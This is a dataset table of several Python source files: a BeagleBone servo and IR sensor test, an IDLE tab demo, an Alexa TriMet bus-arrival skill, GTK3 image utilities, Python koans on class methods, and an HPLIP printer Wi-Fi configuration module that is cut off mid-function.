code stringlengths 3 1.05M | repo_name stringlengths 5 104 | path stringlengths 4 251 | language stringclasses 1 value | license stringclasses 15 values | size int64 3 1.05M |
|---|---|---|---|---|---|
import Adafruit_BBIO.ADC as ADC
import Adafruit_BBIO.GPIO as GPIO
import Adafruit_BBIO.PWM as PWM
import time
ADC.setup()
GPIO.setup("P8_7", GPIO.OUT)
GPIO.output("P8_7", GPIO.HIGH)
servo_pin = "P8_13"
duty_min = 3.5#3
duty_max = 14.5#14.5
duty_span = duty_max - duty_min
angle = 0
direction = "left"
PWM.start(servo_pin, (100-duty_min), 60.0,1)
angle_f = float(angle)
duty = 100 - ((angle_f / 180) * duty_span + duty_min)
PWM.set_duty_cycle(servo_pin, duty)
while 1:
voltage0 = ADC.read_raw("AIN0")
angle_f = float(angle)
duty = 100 - ((angle_f / 180) * duty_span + duty_min)
PWM.set_duty_cycle(servo_pin, duty)
print("IR_Voltage" , voltage0)
print("Angle" , angle)
time.sleep(0.05)
if angle < 180:
if direction == "left":
angle = angle + 1
if direction == "right":
if angle < 1:
direction = "left"
angle = angle +1
else:
angle = angle -1
else:
direction = "right"
angle = angle -1
| jordiguerrero/FresonCam | test_IR_servo.py | Python | gpl-3.0 | 1,050 |
"""
TabHighlight Demo
Make sure "Highlight \t tabs" is checked in the Options menu.
You will see tabs in this file highlighted as a checkered red rectangle.
TabNanny will complain if you press F5.
"""
if True:
print('A tab is highlighted before this line')
# more tabs
# more tabs
for i in range(2):
print(i)
print(2*i) # tab/space issue on this line - clearly visible
print(3*i)
| jnvandermeer/PythonFeedback | idlex-1.11.2/demos/tabhighlight_demo.py | Python | gpl-2.0 | 441 |
from flask import Flask, render_template
from flask_ask import Ask, statement, question, session
import requests
import json
from dateutil.relativedelta import *
from dateutil.parser import *
from datetime import *
import commands
import os
import random
import logging
import boto3
app = Flask(__name__)
app.config.from_pyfile('application.cfg', silent=False)
ask = Ask(app, '/')
names = ["buddy","dude","chum","my friend","Dave","putzy"] # nyuk nyuk
def get_dynamo_client():
return boto3.client(
'dynamodb',
aws_access_key_id=app.config["AWS_ACCESS_KEY"],
aws_secret_access_key=app.config["AWS_SECRET_KEY"],
region_name=app.config["AWS_REGION"]
)
@ask.intent('GetArrivals')
def arrivals(location):
client = get_dynamo_client()
stored_locations = client.get_item(TableName='stop_ids',
Key={'user_id':{'S':session.user.userId}})
if stored_locations.get("Item"):
location = str(",".join(stored_locations["Item"]["stop_ids"]['NS']))
if location==None or location=="home":
location = "444,785"
url = "https://developer.trimet.org/ws/V1/arrivals?locIDs={}&appID={}&json=true".format(location,app.config["APP_ID"])
try:
api_response_json = requests.get(url)
api_response = json.loads(api_response_json.text)
now = parse(commands.getoutput("date"))
alexa_response = ""
if "resultSet" in api_response and "arrival" in api_response["resultSet"]:
for arrival in api_response["resultSet"]["arrival"]:
arrival_time = 0
if arrival.get("status")=="scheduled":
arrival_time = parse(arrival["scheduled"])
else:
arrival_time = parse(arrival["estimated"])
route = arrival["route"]
delta = relativedelta(arrival_time, now).minutes
if alexa_response=="":
alexa_response = "The next {} bus will arrive at {} in ".format(str(route),str(arrival["locid"]))
else:
alexa_response += ". A {} bus will arrive at {} in ".format(str(route),str(arrival["locid"]))
alexa_response += "{} minutes".format(str(delta))
else:
alexa_response="Sorry, I couldn't find any arrival times for you".format(random.choice(names))
except Exception as e:
alexa_response="I'm sorry, {}, something went horribly wrong. {}".format(random.choice(names),e)
return statement(alexa_response)
@ask.intent('AddStopId')
def add_stop_id(location):
client = get_dynamo_client()
result = client.get_item(TableName='stop_ids',
Key={'user_id':{'S':session.user.userId}})
if result['ResponseMetadata']['HTTPStatusCode'] == 404:
return statement("Your ID was not found.")
else:
alexa_response="Okeedoke. Adding stop ID {}".format(location)
result = client.update_item(
TableName='stop_ids',
Key={
'user_id': {'S':session.user.userId}
},
UpdateExpression='ADD stop_ids :i',
ExpressionAttributeValues={
":i": {'NS':[location]}
},
ReturnValues="UPDATED_NEW"
)
# if result['ResponseMetadata']['HTTPStatusCode'] == 200 and result["Item"]:
return statement(alexa_response)
@ask.intent('RemoveStopId')
def remove_stop_id(location):
client = get_dynamo_client()
result = client.get_item(TableName='stop_ids',
Key={'user_id':{'S':session.user.userId}})
if result['ResponseMetadata']['HTTPStatusCode'] == 404:
return statement("Your ID was not found.")
else:
alexa_response="Okeedoke. Removing stop ID {}".format(location)
result = client.update_item(
TableName='stop_ids',
Key={
'user_id': {'S':session.user.userId}
},
UpdateExpression='DELETE stop_ids :i',
ExpressionAttributeValues={
":i": {'NS':[location]}
},
ReturnValues="UPDATED_NEW"
)
# if result['ResponseMetadata']['HTTPStatusCode'] == 200 and result["Item"]:
return statement(alexa_response)
@ask.intent('ListStopIds')
def list_stop_ids():
alexa_response=""
client = get_dynamo_client()
stored_locations = client.get_item(TableName='stop_ids',
Key={'user_id':{'S':session.user.userId}})
if stored_locations.get("Item"):
alexa_response = "You've stored stop i d's {}".format(str(" and ".join(stored_locations["Item"]["stop_ids"]['NS'])))
else:
alexa_response = "Sorry, {}, you haven't stored any stop i d's".format(random.choice(names))
return statement(alexa_response)
if __name__ == "__main__":
app.run(debug=True)
| crustyratfink/ask_trimet | echo_trimet.py | Python | apache-2.0 | 4,858 |
# -*- coding: utf-8 -*-
"""
Copyright (C) 2009 Canonical
Copyright (C) 2012 Fabio Erculiani
Authors:
Michael Vogt
Fabio Erculiani
This program is free software; you can redistribute it and/or modify it under
the terms of the GNU General Public License as published by the Free Software
Foundation; version 3.
This program is distributed in the hope that it will be useful, but WITHOUT
ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
details.
You should have received a copy of the GNU General Public License along with
this program; if not, write to the Free Software Foundation, Inc.,
51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
"""
import os
import logging
import shutil
from gi.repository import Gtk, GdkPixbuf, GObject
from entropy.const import const_mkstemp
from _entropy.rigo.paths import ICON_PATH
LOG = logging.getLogger(__name__)
def point_in(rect, px, py):
return (rect.x <= px <= rect.x + rect.width and
rect.y <= py <= rect.y + rect.height)
def init_sc_css_provider(toplevel, settings, screen, datadir):
context = toplevel.get_style_context()
theme_name = settings.get_property("gtk-theme-name").lower()
if hasattr(toplevel, '_css_provider'):
# check old provider, see if we can skip setting or remove old
# style provider
if toplevel._css_provider._theme_name == theme_name:
return
else: # clean up old css provider if exixts
context.remove_provider_for_screen(screen, toplevel._css_provider)
# munge css path for theme-name
css_path = os.path.join(datadir,
"ui/gtk3/css/rigo.%s.css" % \
theme_name)
# if no css for theme-name try fallback css
if not os.path.exists(css_path):
css_path = os.path.join(datadir, "ui/gtk3/css/rigo.css")
if not os.path.exists(css_path):
# check fallback exists as well... if not return None but warn
# its not the end of the world if there is no fallback, just some
# styling will be derived from the plain ol' Gtk theme
msg = "Could not set rigo " + \
"CSS provider. File '%s' does not exist!"
LOG.warn(msg % css_path)
return None
# things seem ok, now set the css provider for Rigo
msg = "Rigo style provider for %s Gtk theme: %s"
LOG.info(msg % (theme_name, css_path))
provider = Gtk.CssProvider()
provider._theme_name = theme_name
toplevel._css_provider = provider
provider.load_from_path(css_path)
context.add_provider_for_screen(screen, provider, 800)
return css_path
def get_sc_icon_theme(datadir):
# additional icons come from app-install-data
icons = Gtk.IconTheme.get_default()
icons.append_search_path(ICON_PATH)
icons.append_search_path(os.path.join(datadir, "icons"))
icons.append_search_path(os.path.join(datadir, "emblems"))
# HACK: make it more friendly for local installs (for mpt)
icons.append_search_path(datadir+"/icons/32x32/status")
return icons
def resize_image(max_width, image_path, final_image_path):
dirname = os.path.dirname(final_image_path)
tmp_fd, new_image_path = const_mkstemp(
dir=dirname, prefix="resize_image")
os.close(tmp_fd)
shutil.copy2(image_path, new_image_path)
img = Gtk.Image()
img.set_from_file(new_image_path)
img_buf = img.get_pixbuf()
w, h = img_buf.get_width(), img_buf.get_height()
if w > max_width:
# resize pix
new_w = max_width
new_h = new_w * h / w
img_buf = img_buf.scale_simple(int(new_w),
int(new_h), GdkPixbuf.InterpType.BILINEAR)
try:
img_buf.save(new_image_path, "png")
except GObject.GError:
# libpng issue? try jpeg
img_buf.save(new_image_path, "jpeg")
del img_buf
del img
os.rename(new_image_path, final_image_path)
def resize_image_height(max_height, image_path, final_image_path):
dirname = os.path.dirname(final_image_path)
tmp_fd, new_image_path = const_mkstemp(
dir=dirname, prefix="resize_image")
os.close(tmp_fd)
shutil.copy2(image_path, new_image_path)
img = Gtk.Image()
img.set_from_file(new_image_path)
img_buf = img.get_pixbuf()
w, h = img_buf.get_width(), img_buf.get_height()
if h > max_height:
# resize pix
new_h = max_height
new_w = new_h*w/h
img_buf = img_buf.scale_simple(int(new_w),
int(new_h), GdkPixbuf.InterpType.BILINEAR)
try:
img_buf.save(new_image_path, "png")
except GObject.GError:
# libpng issue? try jpeg
img_buf.save(new_image_path, "jpeg")
del img_buf
del img
os.rename(new_image_path, final_image_path)
| Sabayon/entropy | rigo/rigo/ui/gtk3/utils.py | Python | gpl-2.0 | 4,893 |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Based on AboutClassMethods in the Ruby Koans
#
from runner.koan import *
class AboutClassAttributes(Koan):
class Dog:
pass
def test_objects_are_objects(self):
fido = self.Dog()
self.assertEqual(True, isinstance(fido, object))
def test_classes_are_types(self):
self.assertEqual(True, self.Dog.__class__ == type)
def test_classes_are_objects_too(self):
self.assertEqual(True, issubclass(self.Dog, object))
def test_objects_have_methods(self):
fido = self.Dog()
self.assertEqual(26, len(dir(fido)))
def test_classes_have_methods(self):
self.assertEqual(26, len(dir(self.Dog)))
def test_creating_objects_without_defining_a_class(self):
singularity = object()
self.assertEqual(23, len(dir(singularity)))
def test_defining_attributes_on_individual_objects(self):
fido = self.Dog()
fido.legs = 4
self.assertEqual(4, fido.legs)
def test_defining_functions_on_individual_objects(self):
fido = self.Dog()
fido.wag = lambda : 'fidos wag'
self.assertEqual('fidos wag', fido.wag())
def test_other_objects_are_not_affected_by_these_singleton_functions(self):
fido = self.Dog()
rover = self.Dog()
def wag():
return 'fidos wag'
fido.wag = wag
with self.assertRaises(AttributeError): rover.wag()
# ------------------------------------------------------------------
class Dog2:
def wag(self):
return 'instance wag'
def bark(self):
return "instance bark"
def growl(self):
return "instance growl"
#https://stackoverflow.com/questions/12179271/meaning-of-classmethod-and-staticmethod-for-beginner
@staticmethod
def bark():
return "staticmethod bark, arg: None"
@classmethod
def growl(cls):
return "classmethod growl, arg: cls=" + cls.__name__
def test_since_classes_are_objects_you_can_define_singleton_methods_on_them_too(self):
self.assertRegex(self.Dog2.growl(), "classmethod growl, arg: cls=Dog2")
def test_classmethods_are_not_independent_of_instance_methods(self):
fido = self.Dog2()
self.assertRegex(fido.growl(), "classmethod growl, arg: cls=Dog2")
self.assertRegex(self.Dog2.growl(), "classmethod growl, arg: cls=Dog2")
def test_staticmethods_are_unbound_functions_housed_in_a_class(self):
self.assertRegex(self.Dog2.bark(), "staticmethod bark, arg: None")
def test_staticmethods_also_overshadow_instance_methods(self):
fido = self.Dog2()
self.assertRegex(fido.bark(), "staticmethod bark, arg: None")
# ------------------------------------------------------------------
class Dog3:
def __init__(self):
self._name = None
def get_name_from_instance(self):
return self._name
def set_name_from_instance(self, name):
self._name = name
@classmethod
def get_name(cls):
return cls._name
@classmethod
def set_name(cls, name):
cls._name = name
name = property(get_name, set_name)
name_from_instance = property(get_name_from_instance, set_name_from_instance)
def test_classmethods_can_not_be_used_as_properties(self):
fido = self.Dog3()
with self.assertRaises(TypeError): fido.name = "Fido"
def test_classes_and_instances_do_not_share_instance_attributes(self):
fido = self.Dog3()
fido.set_name_from_instance("Fido")
fido.set_name("Rover")
self.assertEqual("Fido", fido.get_name_from_instance())
self.assertEqual("Rover", self.Dog3.get_name())
def test_classes_and_instances_do_share_class_attributes(self):
fido = self.Dog3()
fido.set_name("Fido")
self.assertEqual("Fido", fido.get_name())
self.assertEqual("Fido", self.Dog3.get_name())
# ------------------------------------------------------------------
class Dog4:
def a_class_method(cls):
return 'dogs class method'
def a_static_method():
return 'dogs static method'
a_class_method = classmethod(a_class_method)
a_static_method = staticmethod(a_static_method)
def test_you_can_define_class_methods_without_using_a_decorator(self):
self.assertEqual('dogs class method', self.Dog4.a_class_method())
def test_you_can_define_static_methods_without_using_a_decorator(self):
self.assertEqual('dogs static method', self.Dog4.a_static_method())
# ------------------------------------------------------------------
def test_heres_an_easy_way_to_explicitly_call_class_methods_from_instance_methods(self):
fido = self.Dog4()
self.assertEqual('dogs class method', fido.__class__.a_class_method())
| ChristianAA/python_koans_solutions | python3/koans/about_class_attributes.py | Python | mit | 4,988 |
# -*- coding: utf-8 -*-
#
# (c) Copyright 2003-2009 Hewlett-Packard Development Company, L.P.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
#
# Author: Shunmugaraj.K
#
# StdLib
import time
import io
import binascii
import xml.parsers.expat
from string import *
# Local
from .g import *
from . import device, utils
from .sixext import to_bytes_utf8
http_result_pat = re.compile("""HTTP/\d.\d\s(\d+)""", re.I)
HTTP_OK = 200
HTTP_ACCEPTED = 202
HTTP_NOCONTENT = 204
HTTP_ERROR = 500
MAX_RETRIES = 2
LEDM_WIFI_BASE_URI = "/IoMgmt/Adapters/"
# This payload is working for LaserJet Devices
adapterPowerXml_payload2 ="""<?xml version="1.0" encoding="UTF-8" ?><io:Adapter xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:io="http://www.hp.com/schemas/imaging/con/ledm/iomgmt/2008/11/30" xmlns:dd="http://www.hp.com/schemas/imaging/con/dictionaries/1.0/" xmlns:wifi="http://www.hp.com/schemas/imaging/con/wifi/2009/06/26"> <io:HardwareConfig> <dd:Power>%s</dd:Power> </io:HardwareConfig> </io:Adapter>"""
# This payload is working for OfficeJet and Photosmart Devices
adapterPowerXml_payload1 = """<?xml version="1.0" encoding="UTF-8"?><io:Adapters xmlns:io="http://www.hp.com/schemas/imaging/con/ledm/iomgmt/2008/11/30" xmlns:dd="http://www.hp.com/schemas/imaging/con/dictionaries/1.0/"><io:Adapter><io:HardwareConfig><dd:Power>%s</dd:Power></io:HardwareConfig></io:Adapter></io:Adapters>"""
passPhraseXml="""<io:Profile xmlns:io="http://www.hp.com/schemas/imaging/con/ledm/iomgmt/2008/11/30" xmlns:dd="http://www.hp.com/schemas/imaging/con/dictionaries/1.0/" xmlns:wifi="http://www.hp.com/schemas/imaging/con/wifi/2009/06/26" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.hp.com/schemas/imaging/con/ledm/iomgmt/2008/11/30 ../../schemas/IoMgmt.xsd http://www.hp.com/schemas/imaging/con/dictionaries/1.0/ ../../schemas/dd/DataDictionaryMasterLEDM.xsd"><io:AdapterProfile><io:WifiProfile><wifi:SSID>%s</wifi:SSID><wifi:CommunicationMode>%s</wifi:CommunicationMode><wifi:EncryptionType>%s</wifi:EncryptionType><wifi:AuthenticationMode>%s</wifi:AuthenticationMode></io:WifiProfile></io:AdapterProfile></io:Profile>"""
keyInfoXml = """<io:KeyInfo><io:WpaPassPhraseInfo><wifi:RsnEncryption>AESOrTKIP</wifi:RsnEncryption><wifi:RsnAuthorization>autoWPA</wifi:RsnAuthorization><wifi:PassPhrase>%s</wifi:PassPhrase></io:WpaPassPhraseInfo></io:KeyInfo>"""
def getAdaptorList(dev):
ret,params,elementCount,code ={},{},0,HTTP_ERROR
max_tries = 0
while max_tries < MAX_RETRIES:
max_tries +=1
URI = LEDM_WIFI_BASE_URI[0:len(LEDM_WIFI_BASE_URI)-1]# to remove "\" from the string
paramsList,code = readXmlTagDataFromURI(dev,URI,'<io:Adapters', '<io:Adapter>')
if code == HTTP_OK:
break
if code != HTTP_OK:
log.error("Request Failed With Response Code %d"%code)
return ret
ret['adaptorlistlength'] = len(paramsList)
if len(paramsList) != 0:
a = 0
for params in paramsList:
ret['adaptorpresence-%d' % a] = ''
ret['adaptorstate-%d' % a] = ''
try:
ret['adaptorid-%d' % a] = params['io:adapter-map:resourcenode-map:resourcelink-dd:resourceuri']
except KeyError as e:
log.debug("Missing response key: %s" % e) #changed from error to debug
ret['adaptorid-%d' % a]=""
try:
ret['adaptorname-%d' % a] = params['io:adapter-io:hardwareconfig-dd:name']
except KeyError as e:
log.debug("Missing response key: %s" % e) #changed from error to debug
ret['adaptorname-%d' % a] = ""
try:
ret['adaptortype-%d' % a] = params['io:adapter-io:hardwareconfig-dd:deviceconnectivityporttype']
except KeyError as e:
log.debug("Missing response key: %s" % e) #changed from error to debug
ret['adaptortype-%d' % a] = ""
a = a+1
return ret
def getWifiAdaptorID(dev):
rVal = []
ret = getAdaptorList(dev)
try:
num_adaptors = ret['adaptorlistlength']
except KeyError:
num_adaptors = 0
for n in range(num_adaptors):
try:
name = ret['adaptortype-%d' % n]
except KeyError:
name = ''
if name.lower() in ('wifiembedded', 'wifiaccessory'):
params = ['adaptorid', 'adaptorname', 'adaptorstate', 'adaptorpresence']
r = []
for p in params:
try:
x = ret[''.join([p, '-', str(n)])]
except KeyError:
if p == 'adaptorid':
x = -1
else:
x = 'Unknown'
r.append(x)
rVal.append(r)
return rVal
def setAdaptorPower(dev, adapterList, power_state='on'):
adaptor_id=-1
adaptorName =""
for a in adapterList:
adaptor_id = a[0]
adaptorName = a[1]
ret,powerXml,URI,code = {},'','',HTTP_ERROR
URI = LEDM_WIFI_BASE_URI + adaptorName
powerXml = adapterPowerXml_payload1 %(power_state)
ret['errorreturn'] = writeXmlDataToURI(dev,URI,powerXml,10)
if not(ret['errorreturn'] == HTTP_OK or ret['errorreturn'] == HTTP_NOCONTENT):
log.debug("Wifi Adapter turn ON request Failed. ResponseCode=%s AdaptorId=%s AdaptorName=%s. Trying another interface" %(ret['errorreturn'],adaptor_id,adaptorName))
powerXml = adapterPowerXml_payload2 %(power_state)
ret['errorreturn'] = writeXmlDataToURI(dev,URI,powerXml,10)
if not(ret['errorreturn'] == HTTP_OK or ret['errorreturn'] == HTTP_NOCONTENT):
log.error("Wifi Adapter turn ON request Failed. ResponseCode=%s AdaptorId=%s AdaptorName=%s" %(ret['errorreturn'],adaptor_id,adaptorName))
else:
log.debug("Wifi Adapter turn ON request is Success. AdaptorId=%s AdaptorName=%s" %(adaptor_id,adaptorName))
# adapaterState = a[2], adapterPresence= a[3]
return adaptor_id, adaptorName, a[2], a[3]
return -1 ,"","",""
def performScan(dev, adapterName, ssid=None):
ret ={}
if ssid is None:
URI = LEDM_WIFI_BASE_URI + adapterName + "/WifiNetworks"
else:
URI = LEDM_WIFI_BASE_URI + adapterName + "/WifiNetworks/SSID="+ssid
while True:
params,code,elementCount = readXmlDataFromURI(dev,URI,'<io:WifiNetworks', '<io:WifiNetwork>',10)
if code == HTTP_ACCEPTED:
continue
else:
break
ret['numberofscanentries'] = elementCount
if code != HTTP_OK:
log.error("Request Failed With Response Code %d"%code)
return ret
if params is not None:
if elementCount == 1:
try:
ssid = str(params['io:wifinetworks-io:wifinetwork-wifi:ssid']).decode("hex")
if not ssid:
ret['ssid-0'] = to_unicode('(unknown)')
else:
ret['ssid-0'] = ssid
try:
ret['bssid-0'] = str(params['io:wifinetworks-io:wifinetwork-wifi:bssid']).decode("hex")
except:
ret['bssid-0'] = params['io:wifinetworks-io:wifinetwork-wifi:bssid']
ret['channel-0'] = params['io:wifinetworks-io:wifinetwork-wifi:channel']
ret['communicationmode-0'] = params['io:wifinetworks-io:wifinetwork-wifi:communicationmode']
ret['dbm-0'] = params['io:wifinetworks-io:wifinetwork-io:signalinfo-wifi:dbm']
ret['encryptiontype-0'] = params['io:wifinetworks-io:wifinetwork-wifi:encryptiontype']
ret['signalstrength-0'] = params['io:wifinetworks-io:wifinetwork-io:signalinfo-wifi:signalstrength']
except KeyError as e:
log.debug("Missing response key: %s" % e)
else:
for a in range(elementCount):
try:
try:
ssid = binascii.unhexlify(str(params['io:wifinetworks-io:wifinetwork-wifi:ssid-%d' % a]).encode('utf-8')).decode('utf-8')
except TypeError:
# Some devices returns one invalid SSID (i.e. 0) along with valid SSIDs. e.g. Epic.
ssid = params['io:wifinetworks-io:wifinetwork-wifi:ssid-%d' % a]
if not ssid:
ret['ssid-%d' % a] = to_unicode('(unknown)')
else:
ret['ssid-%d' % a] = ssid
try:
ret['bssid-%d' % a] = str(params['io:wifinetworks-io:wifinetwork-wifi:bssid-%d' % a]).decode("hex")
except:
ret['bssid-%d' % a] = params['io:wifinetworks-io:wifinetwork-wifi:bssid-%d' % a]
ret['channel-%d' % a] = params['io:wifinetworks-io:wifinetwork-wifi:channel-%d' % a]
ret['communicationmode-%d' % a] = params['io:wifinetworks-io:wifinetwork-wifi:communicationmode-%d' % a]
ret['dbm-%d' % a] = params['io:wifinetworks-io:wifinetwork-io:signalinfo-wifi:dbm-%d' % a]
ret['encryptiontype-%d' % a] = params['io:wifinetworks-io:wifinetwork-wifi:encryptiontype-%d' % a]
ret['signalstrength-%d' % a] = params['io:wifinetworks-io:wifinetwork-io:signalinfo-wifi:signalstrength-%d' % a]
except KeyError as e:
log.debug("Missing response key: %s" % e)
try:
ret['signalstrengthmax'] = 5
ret['signalstrengthmin'] = 0
except KeyError as e:
log.debug("Missing response key: %s" % e)
return ret
def getIPConfiguration(dev, adapterName):
ip, hostname, addressmode, subnetmask, gateway, pridns, sec_dns = \
'0.0.0.0', 'Unknown', 'Unknown', '0.0.0.0', '0.0.0.0', '0.0.0.0', '0.0.0.0'
protocol = 'old'
URI = LEDM_WIFI_BASE_URI + adapterName + "/Protocols"
#URI = "/DevMgmt/IOConfigDyn.xml"
params,code,elementCount = {},HTTP_ERROR,0
max_tries = 0
while max_tries < MAX_RETRIES:
max_tries +=1
params,code,elementCount = readXmlDataFromURI(dev,URI,'<io:Protocol', '<io:Protocol')
if code == HTTP_OK:
break
if code != HTTP_OK:
max_tries = 0
URI = "/DevMgmt/IOConfigDyn.xml"
while max_tries < MAX_RETRIES:
max_tries +=1
params,code,elementCount = readXmlDataFromURI(dev,URI,'<iocfgdyn2:IOConfigDyn', '<dd3:IOAdaptorConfig')
if code == HTTP_OK:
protocol = 'new'
break
if code != HTTP_OK:
log.error("Request Failed With Response Code %d" %code)
return ip, hostname, addressmode, subnetmask, gateway, pridns, sec_dns
if protocol == 'old':
if params is not None and code == HTTP_OK:
try:
ip = params['io:protocols-io:protocol-io:addresses-io:ipv4addresses-io:ipv4address-dd:ipv4address']
subnetmask = params['io:protocols-io:protocol-io:addresses-io:ipv4addresses-io:ipv4address-dd:subnetmask']
gateway = params['io:protocols-io:protocol-io:addresses-io:ipv4addresses-io:ipv4address-dd:defaultgateway']
if 'DHCP' in params['io:protocols-io:protocol-io:addresses-io:ipv4addresses-io:ipv4address-dd:configmethod']:
addressmode = 'dhcp'
else:
addressmode = 'autoip'
if elementCount ==1:
pridns = params['io:protocols-io:protocol-dd:dnsserveripaddress']
sec_dns = params['io:protocols-io:protocol-dd:secondarydnsserveripaddress']
for a in range(elementCount):
if params['io:protocols-io:protocol-dd:dnsserveripaddress-%d' %a] !="::":
pridns = params['io:protocols-io:protocol-dd:dnsserveripaddress-%d' %a]
sec_dns = params['io:protocols-io:protocol-dd:secondarydnsserveripaddress-%d' %a]
break
except KeyError as e:
log.error("Missing response key: %s" % str(e))
else:
if params is not None and code == HTTP_OK:
try:
#ip = params['io:protocols-io:protocol-io:addresses-io:ipv4addresses-io:ipv4address-dd:ipv4address']
try:
ip = params['iocfgdyn2:ioconfigdyn-dd3:ioadaptorconfig-dd3:networkadaptorconfig-dd3:ipversionconfig-dd3:ipconfig-dd:ipaddress']
except:
ip = params['iocfgdyn2:ioconfigdyn-dd3:ioadaptorconfig-dd3:networkadaptorconfig-dd3:ipversionconfig-dd3:ipconfig-dd:ipaddress-0']
#subnetmask = params['io:protocols-io:protocol-io:addresses-io:ipv4addresses-io:ipv4address-dd:subnetmask']
try:
subnetmask = params['iocfgdyn2:ioconfigdyn-dd3:ioadaptorconfig-dd3:networkadaptorconfig-dd3:ipversionconfig-dd3:ipconfig-dd:subnetmask']
except:
subnetmask = params['iocfgdyn2:ioconfigdyn-dd3:ioadaptorconfig-dd3:networkadaptorconfig-dd3:ipversionconfig-dd3:ipconfig-dd:subnetmask-0']
#gateway = params['io:protocols-io:protocol-io:addresses-io:ipv4addresses-io:ipv4address-dd:defaultgateway']
try:
gateway = params['iocfgdyn2:ioconfigdyn-dd3:ioadaptorconfig-dd3:networkadaptorconfig-dd3:ipversionconfig-dd3:ipconfig-dd:defaultgateway']
except:
gateway = params['iocfgdyn2:ioconfigdyn-dd3:ioadaptorconfig-dd3:networkadaptorconfig-dd3:ipversionconfig-dd3:ipconfig-dd:defaultgateway-0']
#if 'DHCP' in params['io:protocols-io:protocol-io:addresses-io:ipv4addresses-io:ipv4address-dd:configmethod']:
try:
addressmode = params['iocfgdyn2:ioconfigdyn-dd3:ioadaptorconfig-dd3:networkadaptorconfig-dd3:ipversionconfig-dd3:ipconfig-dd:ipconfigmethod']
except:
addressmode = params['iocfgdyn2:ioconfigdyn-dd3:ioadaptorconfig-dd3:networkadaptorconfig-dd3:ipversionconfig-dd3:ipconfig-dd:ipconfigmethod-0']
if 'dhcp' in addressmode.lower():
addressmode = 'dhcp'
else:
addressmode = 'autoip'
#if elementCount ==1:
# pridns = params['io:protocols-io:protocol-dd:dnsserveripaddress']
# sec_dns = params['io:protocols-io:protocol-dd:secondarydnsserveripaddress']
#for a in xrange(elementCount):
# if params['io:protocols-io:protocol-dd:dnsserveripaddress-%d' %a] !="::":
# pridns = params['io:protocols-io:protocol-dd:dnsserveripaddress-%d' %a]
# sec_dns = params['io:protocols-io:protocol-dd:secondarydnsserveripaddress-%d' %a]
# break
except KeyError as e:
log.error("Missing response key: %s" % str(e))
log.debug("ip=%s, hostname=%s, addressmode=%s, subnetmask=%s, gateway=%s, pridns=%s, sec_dns=%s"%(ip, hostname, addressmode, subnetmask, gateway, pridns, sec_dns))
return ip, hostname, addressmode, subnetmask, gateway, pridns, sec_dns
def getCryptoSuite(dev, adapterName):
alg, mode, secretid = '', '', ''
parms,code,elementCount ={},HTTP_ERROR,0
URI = LEDM_WIFI_BASE_URI + adapterName + "/Profiles/Active"
max_tries = 0
while max_tries < MAX_RETRIES:
max_tries +=1
parms,code,elementCount = readXmlDataFromURI(dev,URI,'<io:Profile', '<io:Profile')
if code == HTTP_OK:
break
if code !=HTTP_OK:
log.error("Request Failed With Response Code %d" %code)
return alg, mode, secretid
if parms is not None:
try:
mode = parms['io:profile-io:adapterprofile-io:wifiprofile-wifi:communicationmode']
alg = parms['io:profile-io:adapterprofile-io:wifiprofile-wifi:encryptiontype']
secretid = parms['io:profile-io:adapterprofile-io:wifiprofile-wifi:bssid']
except KeyError as e:
log.debug("Missing response key: %s" % str(e))
return alg, mode, secretid
def associate(dev, adapterName, ssid, communication_mode, encryption_type, key):
ret,code = {},HTTP_ERROR
URI = LEDM_WIFI_BASE_URI + adapterName + "/Profiles/Active"
if encryption_type == 'none':
authMode = 'open'
ppXml = passPhraseXml%(binascii.hexlify(to_bytes_utf8(ssid)).decode('utf-8'), communication_mode,encryption_type,authMode)
else:
authMode = encryption_type
pos = passPhraseXml.find("</io:WifiProfile>",0,len(passPhraseXml))
ppXml = (passPhraseXml[:pos] + keyInfoXml + passPhraseXml[pos:])%(binascii.hexlify(to_bytes_utf8(ssid)).decode('utf-8'),communication_mode,encryption_type,\
authMode,binascii.hexlify(to_bytes_utf8(key)).decode('utf-8'))
code = writeXmlDataToURI(dev,URI,ppXml,10)
ret['errorreturn'] = code
if not(code == HTTP_OK or HTTP_NOCONTENT):
log.error("Request Failed With Response Code %d" % ret['errorreturn'])
return ret
def getVSACodes(dev, adapterName):
ret,params,code,elementCount = [],{},HTTP_ERROR,0
severity,rule ='',''
URI = LEDM_WIFI_BASE_URI + adapterName + "/VsaCodes.xml"
max_tries = 0
while max_tries < MAX_RETRIES:
max_tries +=1
params,code,elementCount = readXmlDataFromURI(dev,URI,"<io:VsaCodes","<io:VsaCodes",10)
if code == HTTP_OK:
break
if code != HTTP_OK:
log.warn("Request Failed With Response Code %d"%code)
return ret
if params is not None:
try:
severity= params['io:vsacodes-wifi:vsacode-dd:severity']
except:
severity = ""
try:
rule = params['io:vsacodes-wifi:vsacode-wifi:rulenumber']
# except KeyError, e:
# log.error("Missing response key: %s" % str(e))
except:
rule = ""
ret.append((rule, severity))
return ret
def getHostname(dev):
hostName = ''
URI = "/IoMgmt/IoConfig.xml"
max_tries = 0
while max_tries < MAX_RETRIES:
max_tries +=1
params,code,elementCount = readXmlDataFromURI(dev,URI,'<io:IoConfig', '<io:IoConfig')
if code == HTTP_OK:
break
if code != HTTP_OK:
log.warn("Request failed with Response code %d. HostName not found."%code)
return hostName
if params is not None:
try:
hostName = params['io:ioconfig-io:iodeviceconfig-dd3:hostname']
except KeyError as e:
log.debug("Missing response key: %s" % e)
return hostName
def getSignalStrength(dev, adapterName, ssid, adaptor_id=0):
ss_max, ss_min, ss_val, ss_dbm = 5, 0, 0, -200
params,code,elementCount = {},HTTP_ERROR,0
if ssid is not None:
URI = LEDM_WIFI_BASE_URI + adapterName + "/WifiNetworks/SSID="+ssid
else:
return ss_max, ss_min, ss_val, ss_dbm
while True:
